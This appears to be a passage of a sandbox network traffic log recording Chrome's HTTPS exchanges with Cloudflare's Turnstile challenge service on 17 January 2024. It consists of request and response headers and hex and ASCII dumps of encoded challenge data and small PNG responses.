                                                                                                                                                              Data Ascii: 7d2bc3Nub41thoeOW5Z3jpeSb3iBlnqcaJ6En2t8fm1zhreMg3aPlXSLjZOyoraPpX+Xur++pL6EoJiP0MKzyMmWlc+ok9a61Libl5m3u8Se0dvEotXhzMrZ6MfqsL+t7aix88u4yPzu2+C57NH7wPH78MO7CP3FCera4ePsDwn26AcNEeT1EtkPExnx8BHzJv4D9QQD9/oH5Q35HP4EBO8WOTn5FPgbG/wtQB4gFxkhJwQeFR8FLD9FDiouR
                                                                                                                                                              2024-01-17 16:39:18 UTC1369INData Raw: 65 32 2b 45 62 71 53 45 6c 62 53 76 68 59 65 30 66 4c 79 52 71 70 61 39 72 58 69 6b 66 34 61 39 77 63 79 37 70 38 32 36 77 64 4f 6f 76 4e 47 6c 73 73 75 78 78 73 76 4e 6a 35 75 64 74 38 76 5a 6e 61 2b 2b 70 72 65 35 6f 2b 44 46 75 4e 2b 37 33 37 6a 42 75 71 58 4d 38 4f 2b 70 39 2f 50 69 78 74 6e 52 30 73 72 4d 33 73 72 67 41 64 6e 51 30 50 57 2f 39 38 62 74 77 2f 33 65 7a 4d 33 2b 43 65 6e 52 41 51 34 4e 2b 66 76 61 2b 39 54 72 38 50 72 33 46 67 58 68 46 68 72 35 47 53 45 66 2b 79 6b 46 2b 53 38 4e 43 41 51 4f 41 51 30 4a 4f 44 41 75 38 77 30 65 46 76 77 62 44 54 77 56 4e 42 6f 54 46 78 63 6a 50 78 78 4d 4f 41 56 4b 4f 53 55 79 4a 7a 31 4b 51 46 55 6b 49 69 59 35 4f 69 5a 49 50 6b 31 54 50 44 6f 66 4a 45 49 2f 4e 55 42 46 4a 47 64 45 52 69 5a 73 4b 32 59
                                                                                                                                                              Data Ascii: e2+EbqSElbSvhYe0fLyRqpa9rXikf4a9wcy7p826wdOovNGlssuxxsvNj5udt8vZna++pre5o+DFuN+737jBuqXM8O+p9/PixtnR0srM3srgAdnQ0PW/98btw/3ezM3+CenRAQ4N+fva+9Tr8Pr3FgXhFhr5GSEf+ykF+S8NCAQOAQ0JODAu8w0eFvwbDTwVNBoTFxcjPxxMOAVKOSUyJz1KQFUkIiY5OiZIPk1TPDofJEI/NUBFJGdERiZsK2Y
                                                                                                                                                              2024-01-17 16:39:18 UTC1369INData Raw: 34 6c 32 69 49 32 33 76 48 4a 33 66 4a 75 63 6d 35 47 79 70 38 69 63 6e 70 32 37 70 73 65 6d 79 73 4b 68 78 4a 4b 50 31 4d 76 45 73 4d 6d 71 32 4e 33 66 32 4d 76 4b 6d 75 47 34 35 72 7a 48 74 65 57 64 32 64 58 70 74 39 48 6e 35 73 53 75 79 66 4c 31 73 76 54 75 30 64 33 47 30 77 44 58 7a 2f 76 41 41 2b 37 57 34 76 33 52 42 38 6a 63 78 65 50 6e 30 4d 37 2b 34 75 41 46 44 50 45 50 32 65 38 4b 38 39 6f 55 35 78 33 5a 44 67 58 79 2b 41 4d 65 38 68 4d 44 36 69 6f 49 2b 50 77 6e 36 79 63 54 37 52 55 4d 4b 44 63 4a 39 76 67 70 44 53 67 58 49 53 4e 41 4c 7a 6e 39 42 51 55 49 52 67 59 71 48 53 45 6a 55 41 4d 49 4e 43 35 54 56 68 63 50 4a 6c 74 53 55 31 77 65 46 55 31 50 51 54 4a 69 50 54 4a 6b 52 45 4e 4c 4b 31 6f 74 62 6a 6f 72 4b 6a 4a 4a 63 33 4e 58 4d 30 5a 4e
                                                                                                                                                              Data Ascii: 4l2iI23vHJ3fJucm5Gyp8icnp27psemysKhxJKP1MvEsMmq2N3f2MvKmuG45rzHteWd2dXpt9Hn5sSuyfL1svTu0d3G0wDXz/vAA+7W4v3RB8jcxePn0M7+4uAFDPEP2e8K89oU5x3ZDgXy+AMe8hMD6ioI+Pwn6ycT7RUMKDcJ9vgpDSgXISNALzn9BQUIRgYqHSEjUAMINC5TVhcPJltSU1weFU1PQTJiPTJkRENLK1otbjorKjJJc3NXM0ZN
                                                                                                                                                              2024-01-17 16:39:18 UTC1369INData Raw: 78 39 6e 4c 69 50 75 37 57 43 79 5a 47 72 69 49 72 47 71 5a 33 4d 78 63 6a 42 72 4d 2f 49 69 61 6a 58 31 4d 6e 46 7a 73 32 38 6e 39 4f 55 78 4d 57 68 76 62 43 78 35 64 33 62 75 38 33 71 75 74 36 78 79 65 66 46 37 38 72 57 38 65 4b 79 75 2f 54 51 36 39 53 33 77 4e 63 45 41 74 6a 50 38 77 48 63 36 77 66 39 33 68 44 47 30 50 4c 74 7a 50 48 78 36 2b 55 4d 46 66 76 35 47 50 72 37 37 42 73 4c 48 66 49 63 33 75 37 6c 36 43 59 6d 46 65 67 4c 44 41 30 45 38 53 77 71 4b 4f 7a 76 44 4f 34 71 39 54 76 38 39 78 6e 35 50 7a 73 51 4e 6a 6f 65 41 7a 30 61 46 79 49 56 2f 69 41 35 4a 6b 45 2f 53 43 67 78 49 67 6b 6c 46 42 59 78 4e 56 63 51 4f 43 77 61 56 54 46 4d 54 53 39 56 59 56 59 6a 58 30 41 73 5a 57 74 52 4b 53 68 51 62 6e 5a 4e 51 43 39 6b 55 47 78 46 5a 6a 77 35 58
                                                                                                                                                              Data Ascii: x9nLiPu7WCyZGriIrGqZ3MxcjBrM/IiajX1MnFzs28n9OUxMWhvbCx5d3bu83qut6xyefF78rW8eKyu/TQ69S3wNcEAtjP8wHc6wf93hDG0PLtzPHx6+UMFfv5GPr77BsLHfIc3u7l6CYmFegLDA0E8SwqKOzvDO4q9Tv89xn5PzsQNjoeAz0aFyIV/iA5JkE/SCgxIgklFBYxNVcQOCwaVTFMTS9VYVYjX0AsZWtRKShQbnZNQC9kUGxFZjw5X
                                                                                                                                                              2024-01-17 16:39:18 UTC1369INData Raw: 31 65 71 43 38 6e 4b 48 4c 76 38 75 78 77 64 43 6f 73 62 44 4c 70 36 69 6a 6f 73 69 54 70 74 6d 56 75 4b 71 71 34 62 53 6a 72 37 6a 66 35 71 6a 63 78 63 71 6d 32 72 72 79 72 64 33 54 7a 73 4c 75 37 4e 6a 30 31 4f 76 65 78 39 48 57 7a 64 72 68 76 74 6a 42 76 77 63 44 39 76 67 42 77 77 33 67 7a 4e 33 4d 35 39 2f 6c 44 2f 59 55 47 39 66 53 32 50 34 58 31 68 55 4e 32 41 4c 79 47 52 41 6b 49 2f 63 58 2f 51 34 72 37 4f 55 42 41 76 41 6a 46 52 4d 78 4e 54 54 33 4c 79 73 7a 48 41 66 31 4f 76 50 34 2f 42 73 63 53 43 49 54 4b 42 35 41 42 30 6b 4c 4a 67 74 47 45 53 6b 73 4c 68 42 44 4d 44 6f 57 47 44 64 55 58 31 42 64 51 31 41 32 4c 56 51 79 5a 30 46 45 4f 79 4a 72 59 44 35 64 4d 47 46 43 50 54 52 51 52 31 4a 4e 62 6a 46 55 4f 47 5a 4c 63 45 74 4e 51 54 70 57 5a 57
                                                                                                                                                              Data Ascii: 1eqC8nKHLv8uxwdCosbDLp6ijosiTptmVuKqq4bSjr7jf5qjcxcqm2rryrd3TzsLu7Nj01Ovex9HWzdrhvtjBvwcD9vgBww3gzN3M59/lD/YUG9fS2P4X1hUN2ALyGRAkI/cX/Q4r7OUBAvAjFRMxNTT3LyszHAf1OvP4/BscSCITKB5AB0kLJgtGESksLhBDMDoWGDdUX1BdQ1A2LVQyZ0FEOyJrYD5dMGFCPTRQR1JNbjFUOGZLcEtNQTpWZW
                                                                                                                                                              2024-01-17 16:39:18 UTC1369INData Raw: 71 49 66 4c 77 71 69 37 6e 39 57 6f 77 4b 53 32 70 61 2b 61 71 5a 6e 4d 6b 70 65 65 75 37 79 37 70 74 4c 48 36 4c 62 55 76 64 76 46 71 74 48 43 76 36 6e 71 38 71 33 4a 72 76 6d 32 37 65 76 72 74 72 2b 39 73 39 6e 31 32 4d 44 6c 31 4e 6e 59 2b 64 4d 46 2b 67 2f 35 2f 75 37 72 37 78 59 49 30 74 49 61 30 2b 49 5a 46 78 62 73 39 2b 77 51 47 66 58 32 44 78 6b 66 34 51 59 68 35 78 6f 50 48 67 33 76 42 42 41 74 36 67 77 70 42 76 49 4d 2b 42 59 73 43 76 6b 36 4e 2f 6b 36 47 67 46 45 49 52 73 39 4b 53 49 35 4e 6b 35 43 48 79 56 4f 52 43 68 57 53 53 68 49 4c 69 4a 52 4a 54 4a 4d 4e 31 6f 30 4d 56 31 65 4f 32 52 69 50 44 64 6f 49 6a 39 68 62 47 74 44 4f 79 78 78 58 6c 59 31 62 46 45 77 59 6b 74 37 50 48 56 71 65 6c 31 32 57 6c 42 7a 51 33 4a 46 67 49 74 49 67 30 31
                                                                                                                                                              Data Ascii: qIfLwqi7n9WowKS2pa+aqZnMkpeeu7y7ptLH6LbUvdvFqtHCv6nq8q3Jrvm27evrtr+9s9n12MDl1NnY+dMF+g/5/u7r7xYI0tIa0+IZFxbs9+wQGfX2Dxkf4QYh5xoPHg3vBBAt6gwpBvIM+BYsCvk6N/k6GgFEIRs9KSI5Nk5CHyVORChWSShILiJRJTJMN1o0MV1eO2RiPDdoIj9hbGtDOyxxXlY1bFEwYkt7PHVqel12WlBzQ3JFgItIg01
                                                                                                                                                              2024-01-17 16:39:18 UTC1369INData Raw: 36 75 76 70 61 57 50 73 5a 53 31 30 62 33 4a 79 37 48 52 73 4f 47 74 35 39 62 6e 36 4c 7a 43 37 4c 61 67 33 75 44 52 35 4d 58 6f 33 75 62 73 35 4f 6e 76 38 2f 65 37 38 37 7a 32 76 4e 75 36 34 75 2b 38 43 4d 50 58 38 75 6a 2b 37 66 7a 68 34 64 2f 2b 45 65 7a 4e 37 2f 48 70 32 50 44 35 37 68 37 7a 2f 68 55 56 32 50 30 61 46 65 38 66 42 2f 50 67 2b 67 73 6e 41 54 41 66 42 76 76 70 43 53 59 44 37 53 34 77 43 42 4c 32 2f 66 34 49 45 79 2f 34 45 78 37 38 48 78 51 61 4e 30 67 73 42 6b 64 51 49 77 6f 4c 4d 69 67 65 53 69 55 52 45 56 51 32 53 6a 31 4e 4c 6a 77 33 56 6c 70 65 5a 43 52 54 52 7a 52 6f 58 45 4e 6f 57 6c 42 4a 58 32 74 6b 58 6e 5a 32 54 46 6c 79 4e 45 6c 52 4e 30 5a 65 4e 7a 71 41 59 6c 39 78 51 49 4f 43 57 48 31 49 53 55 74 4f 69 55 36 51 6a 6d 53 43
                                                                                                                                                              Data Ascii: 6uvpaWPsZS10b3Jy7HRsOGt59bn6LzC7Lag3uDR5MXo3ubs5Onv8/e787z2vNu64u+8CMPX8uj+7fzh4d/+EezN7/Hp2PD57h7z/hUV2P0aFe8fB/Pg+gsnATAfBvvpCSYD7S4wCBL2/f4IEy/4Ex78HxQaN0gsBkdQIwoLMigeSiUREVQ2Sj1NLjw3VlpeZCRTRzRoXENoWlBJX2tkXnZ2TFlyNElRN0ZeNzqAYl9xQIOCWH1ISUtOiU6QjmSC
                                                                                                                                                              2024-01-17 16:39:18 UTC1369INData Raw: 6a 4a 79 73 65 58 33 39 6d 77 75 74 65 68 7a 39 7a 62 6d 39 6d 6d 35 4c 72 62 31 2b 53 2b 34 4f 6e 52 73 4f 48 69 73 2f 58 7a 2b 4c 54 72 2f 65 75 33 32 66 58 39 35 50 6a 53 77 4e 33 54 43 51 58 4a 43 77 6f 4a 2f 64 6f 53 43 66 34 4c 44 67 7a 79 31 66 6e 6d 39 75 34 52 43 75 77 61 38 66 6b 66 34 53 50 64 2b 78 34 46 49 50 63 64 48 75 45 69 48 4f 77 45 45 43 6a 6f 4b 41 38 72 4d 2f 62 35 4b 54 4d 52 4d 51 6f 31 4c 45 55 30 50 67 45 45 50 45 41 46 4f 55 38 71 55 51 73 63 55 51 77 73 4c 53 55 6a 4f 44 4a 58 4b 44 73 74 4c 6c 67 32 58 53 39 5a 51 31 68 57 5a 7a 56 44 51 6c 35 58 4c 45 56 68 58 32 6c 74 53 46 42 7a 51 6e 46 33 65 6d 4d 75 65 6e 45 38 4d 6e 4a 36 68 45 52 63 5a 34 64 64 66 6e 78 49 59 55 78 48 54 56 35 39 66 32 56 50 67 59 6c 6c 6a 70 4f 44 6a
                                                                                                                                                              Data Ascii: jJyseX39mwutehz9zbm9mm5Lrb1+S+4OnRsOHis/Xz+LTr/eu32fX95PjSwN3TCQXJCwoJ/doSCf4LDgzy1fnm9u4RCuwa8fkf4SPd+x4FIPcdHuEiHOwEECjoKA8rM/b5KTMRMQo1LEU0PgEEPEAFOU8qUQscUQwsLSUjODJXKDstLlg2XS9ZQ1hWZzVDQl5XLEVhX2ltSFBzQnF3emMuenE8MnJ6hERcZ4ddfnxIYUxHTV59f2VPgYlljpODj
                                                                                                                                                              2024-01-17 16:39:18 UTC1369INData Raw: 64 77 4c 43 6c 32 4e 6d 78 35 4e 69 6d 36 4e 37 50 79 4d 72 6e 73 76 54 51 7a 75 33 75 73 4c 6d 77 36 4e 54 52 78 2f 33 79 7a 4d 72 4d 2b 74 6a 47 39 64 72 6e 43 77 62 34 36 77 66 73 2b 2b 72 70 44 64 4c 69 45 75 72 52 32 52 66 76 36 73 38 61 38 78 66 66 33 39 77 6c 46 50 30 53 35 53 67 47 42 66 33 6d 37 69 6b 4e 47 68 33 77 4a 79 7a 32 4c 78 55 57 38 6a 44 31 2b 50 6f 65 46 78 51 54 46 68 59 2f 45 41 51 43 45 77 45 39 4e 69 55 73 49 55 38 6a 52 30 6f 78 48 30 59 69 55 55 34 37 4f 68 78 4c 48 78 70 69 48 56 63 39 5a 6b 41 37 47 6b 4e 72 49 6a 68 46 4a 6a 74 76 4f 57 46 44 63 31 39 57 52 56 46 76 5a 54 64 5a 56 54 56 36 55 6a 34 35 66 45 4a 6b 56 6f 68 62 52 57 46 62 69 30 69 4c 5a 32 47 43 62 46 74 63 68 58 43 55 69 4a 53 5a 64 33 32 4e 6c 5a 75 57 57 56
                                                                                                                                                              Data Ascii: dwLCl2Nmx5Nim6N7PyMrnsvTQzu3usLmw6NTRx/3yzMrM+tjG9drnCwb46wfs++rpDdLiEurR2Rfv6s8a8xff39wlFP0S5SgGBf3m7ikNGh3wJyz2LxUW8jD1+PoeFxQTFhY/EAQCEwE9NiUsIU8jR0oxH0YiUU47OhxLHxpiHVc9ZkA7GkNrIjhFJjtvOWFDc19WRVFvZTdZVTV6Uj45fEJkVohbRWFbi0iLZ2GCbFtchXCUiJSZd32NlZuWWV


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              29192.168.2.449782104.17.3.1844434520C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              2024-01-17 16:39:18 UTC487OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/1369030472:1705508754:EmThWJxmRohva1owlnsvJ5GEpCR6N4Hxvwfz_SQ26Ik/847008825fbf8ce0/150b112ab8f1d86 HTTP/1.1
                                                                                                                                                              Host: challenges.cloudflare.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                              Accept: */*
                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              2024-01-17 16:39:18 UTC386INHTTP/1.1 400 Bad Request
                                                                                                                                                              Date: Wed, 17 Jan 2024 16:39:18 GMT
                                                                                                                                                              Content-Type: application/json
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: close
                                                                                                                                                              cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                              cf-chl-out: DcueyjLcjlKjh+k/dBUKLQ==$ZbwtBqUSn5nQKbGK6yBoNA==
                                                                                                                                                              Server: cloudflare
                                                                                                                                                              CF-RAY: 84700896a9124331-EWR
                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                              2024-01-17 16:39:18 UTC12INData Raw: 37 0d 0a 69 6e 76 61 6c 69 64 0d 0a
                                                                                                                                                              Data Ascii: 7invalid
                                                                                                                                                              2024-01-17 16:39:18 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              30192.168.2.449783104.17.2.1844434520C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              2024-01-17 16:39:18 UTC775OUTGET /cdn-cgi/challenge-platform/h/b/i/847008825fbf8ce0/1705509558146/ATHlue7vcGlmiy5 HTTP/1.1
                                                                                                                                                              Host: challenges.cloudflare.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                              Sec-Fetch-Dest: image
                                                                                                                                                              Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/1af7i/0x4AAAAAAAQGgmt388O38mZL/auto/normal
                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              2024-01-17 16:39:19 UTC208INHTTP/1.1 200 OK
                                                                                                                                                              Date: Wed, 17 Jan 2024 16:39:19 GMT
                                                                                                                                                              Content-Type: image/png
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: close
                                                                                                                                                              Server: cloudflare
                                                                                                                                                              CF-RAY: 84700898991c43dd-EWR
                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                              2024-01-17 16:39:19 UTC67INData Raw: 33 64 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 2c 00 00 00 2b 08 02 00 00 00 8c e3 fd ee 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82 0d 0a
                                                                                                                                                              Data Ascii: 3dPNGIHDR,+IDAT$IENDB`
                                                                                                                                                              2024-01-17 16:39:19 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              31192.168.2.449784104.17.3.1844434520C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              2024-01-17 16:39:19 UTC428OUTGET /cdn-cgi/challenge-platform/h/b/i/847008825fbf8ce0/1705509558146/ATHlue7vcGlmiy5 HTTP/1.1
                                                                                                                                                              Host: challenges.cloudflare.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                              Accept: */*
                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              2024-01-17 16:39:19 UTC208INHTTP/1.1 200 OK
                                                                                                                                                              Date: Wed, 17 Jan 2024 16:39:19 GMT
                                                                                                                                                              Content-Type: image/png
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: close
                                                                                                                                                              Server: cloudflare
                                                                                                                                                              CF-RAY: 8470089b3e4d78d6-EWR
                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                              2024-01-17 16:39:19 UTC67INData Raw: 33 64 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 2c 00 00 00 2b 08 02 00 00 00 8c e3 fd ee 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82 0d 0a
                                                                                                                                                              Data Ascii: 3dPNGIHDR,+IDAT$IENDB`
                                                                                                                                                              2024-01-17 16:39:19 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              32192.168.2.449785104.17.2.1844434520C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              2024-01-17 16:39:19 UTC804OUTGET /cdn-cgi/challenge-platform/h/b/pat/847008825fbf8ce0/1705509558147/42cd1f2bd49e95087981761b7cf53c90b1554ff299170fbe1e6299d6d5f703db/VKvcEsHybHjFSnE HTTP/1.1
                                                                                                                                                              Host: challenges.cloudflare.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                              Accept: */*
                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                              Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/1af7i/0x4AAAAAAAQGgmt388O38mZL/auto/normal
                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              2024-01-17 16:39:19 UTC152INHTTP/1.1 401 Unauthorized
                                                                                                                                                              Date: Wed, 17 Jan 2024 16:39:19 GMT
                                                                                                                                                              Content-Type: text/plain; charset=UTF-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: close
                                                                                                                                                              2024-01-17 16:39:19 UTC1374INData Raw: 77 77 77 2d 61 75 74 68 65 6e 74 69 63 61 74 65 3a 20 50 72 69 76 61 74 65 54 6f 6b 65 6e 20 63 68 61 6c 6c 65 6e 67 65 3d 41 41 49 41 47 58 42 68 64 43 31 70 63 33 4e 31 5a 58 49 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 67 51 73 30 66 4b 39 53 65 6c 51 68 35 67 58 59 62 66 50 55 38 6b 4c 46 56 54 5f 4b 5a 46 77 2d 2d 48 6d 4b 5a 31 74 58 33 41 39 73 41 47 57 4e 6f 59 57 78 73 5a 57 35 6e 5a 58 4d 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 3d 2c 20 74 6f 6b 65 6e 2d 6b 65 79 3d 4d 49 49 42 55 6a 41 39 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 6f 77 4d 4b 41 4e 4d 41 73 47 43 57 43 47 53 41 46 6c 41 77 51 43 41 71 45 61 4d 42 67 47 43 53 71 47 53 49 62 33 44 51 45 42 43 44 41 4c 42 67 6c 67 68 6b 67 42 5a 51 4d 45 41 67
                                                                                                                                                              Data Ascii: www-authenticate: PrivateToken challenge=AAIAGXBhdC1pc3N1ZXIuY2xvdWRmbGFyZS5jb20gQs0fK9SelQh5gXYbfPU8kLFVT_KZFw--HmKZ1tX3A9sAGWNoYWxsZW5nZXMuY2xvdWRmbGFyZS5jb20=, token-key=MIIBUjA9BgkqhkiG9w0BAQowMKANMAsGCWCGSAFlAwQCAqEaMBgGCSqGSIb3DQEBCDALBglghkgBZQMEAg
                                                                                                                                                              2024-01-17 16:39:19 UTC6INData Raw: 31 0d 0a 4a 0d 0a
                                                                                                                                                              Data Ascii: 1J
                                                                                                                                                              2024-01-17 16:39:19 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              33192.168.2.449789104.17.2.1844434520C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              2024-01-17 16:39:20 UTC917OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/1369030472:1705508754:EmThWJxmRohva1owlnsvJ5GEpCR6N4Hxvwfz_SQ26Ik/847008825fbf8ce0/150b112ab8f1d86 HTTP/1.1
                                                                                                                                                              Host: challenges.cloudflare.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Content-Length: 28253
                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                              Content-type: application/x-www-form-urlencoded
                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                              CF-Challenge: 150b112ab8f1d86
                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                              Accept: */*
                                                                                                                                                              Origin: https://challenges.cloudflare.com
                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                              Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/1af7i/0x4AAAAAAAQGgmt388O38mZL/auto/normal
                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              2024-01-17 16:39:20 UTC16384OUTData Raw: 76 5f 38 34 37 30 30 38 38 32 35 66 62 66 38 63 65 30 3d 6a 55 67 4f 4a 66 46 73 43 76 78 35 55 30 69 46 38 46 72 35 4e 4f 6d 54 54 35 4c 4f 4c 65 48 59 46 76 35 30 65 35 25 32 62 46 30 72 35 46 64 67 69 59 46 77 69 35 48 53 35 30 31 46 36 6a 4f 6e 56 46 70 31 54 35 59 56 30 79 68 69 35 46 4e 35 33 4f 72 73 35 55 4f 35 45 31 78 54 4f 4a 67 35 57 35 68 67 35 6c 47 46 4f 30 31 35 46 5a 78 35 6d 4c 65 72 4e 44 54 38 35 48 70 6b 35 78 74 50 43 41 55 33 37 4b 35 48 43 35 36 32 35 35 36 65 6b 56 46 71 35 46 73 35 66 71 69 35 64 71 78 6c 65 65 35 34 64 58 66 35 69 37 66 67 7a 6a 4a 4a 65 58 66 35 4e 47 66 50 78 65 46 4a 48 6d 4f 75 72 50 67 50 79 35 43 35 56 32 67 71 35 30 61 4c 55 59 69 73 37 34 71 66 55 43 46 6a 61 43 24 46 6a 39 24 33 50 39 38 66 56 58 62 64
                                                                                                                                                              Data Ascii: v_847008825fbf8ce0=jUgOJfFsCvx5U0iF8Fr5NOmTT5LOLeHYFv50e5%2bF0r5FdgiYFwi5HS501F6jOnVFp1T5YV0yhi5FN53Ors5UO5E1xTOJg5W5hg5lGFO015FZx5mLerNDT85Hpk5xtPCAU37K5HC562556ekVFq5Fs5fqi5dqxlee54dXf5i7fgzjJJeXf5NGfPxeFJHmOurPgPy5C5V2gq50aLUYis74qfUCFjaC$Fj9$3P98fVXbd
                                                                                                                                                              2024-01-17 16:39:20 UTC11869OUTData Raw: 79 47 67 4f 4b 65 66 78 46 31 35 52 56 48 43 72 78 66 67 46 66 4f 57 65 31 4f 76 67 66 41 46 77 35 6d 4f 69 65 65 6f 35 76 4f 35 69 35 39 69 47 65 30 4e 35 24 35 69 35 48 59 46 6e 35 74 65 35 4d 35 56 35 4c 56 4b 55 35 74 35 73 56 69 31 35 43 35 6b 56 72 78 35 59 35 6e 55 30 56 46 36 51 65 54 4e 69 35 44 48 72 2b 30 2d 55 59 35 46 72 38 65 4f 62 35 73 77 35 66 46 49 69 65 56 69 71 56 2b 4f 6a 38 30 69 35 56 35 76 42 69 71 56 4e 35 53 67 72 77 61 65 35 61 4f 67 43 66 7a 35 4f 56 46 43 66 33 35 33 69 69 78 30 42 35 37 4f 76 78 30 74 43 64 4f 68 69 46 7a 35 6c 4f 67 34 46 77 35 2b 67 66 78 30 24 35 4b 4f 68 69 46 46 35 55 65 6a 78 46 32 35 34 4f 76 35 35 52 35 33 65 67 69 66 38 35 49 65 48 31 46 61 2b 61 65 66 44 46 61 2b 77 65 69 69 46 45 35 47 38 42 59 30
